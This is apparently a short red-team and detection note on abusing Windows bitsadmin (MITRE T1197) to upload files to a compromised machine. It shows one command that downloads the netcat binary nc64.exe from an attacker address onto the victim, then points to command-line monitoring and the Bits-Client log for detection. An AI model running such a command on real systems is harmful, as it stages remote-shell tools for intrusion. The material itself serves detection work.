description |
---|
File upload to the compromised system. |
{% code title="attacker@victim" %}
bitsadmin /transfer myjob /download /priority high http://10.0.0.5/nc64.exe c:\temp\nc.exe
{% endcode %}
Commandline arguments monitoring can help discover bitsadmin usage:
Application Logs > Microsoft > Windows > Bits-Client > Operational
shows logs related to jobs, which you may want to monitor as well. An example of one of the jobs:
{% embed url="https://attack.mitre.org/wiki/Technique/T1197" %}